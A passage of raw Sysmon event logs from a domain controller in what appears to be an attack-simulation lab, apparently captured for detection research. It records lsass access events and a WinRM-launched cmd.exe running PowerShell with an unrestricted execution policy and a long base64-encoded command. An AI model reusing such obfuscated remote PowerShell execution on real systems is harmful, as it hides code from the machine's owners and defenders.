13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-857F-5FCF-A400-000000009101}3188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-857E-5FCF-9C00-000000009101}49365004C:\Windows\system32\WinrsHost.exe{10ACEC4A-857F-5FCF-A400-000000009101}3188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.498{10ACEC4A-857F-5FCF-A400-000000009101}3188C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.491{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.460{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.460{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.460{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:07.069{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ugdo1hjh.dll2020-12-08 13:54:06.913 10341000x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857F-5FCF-A300-000000009101}4596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 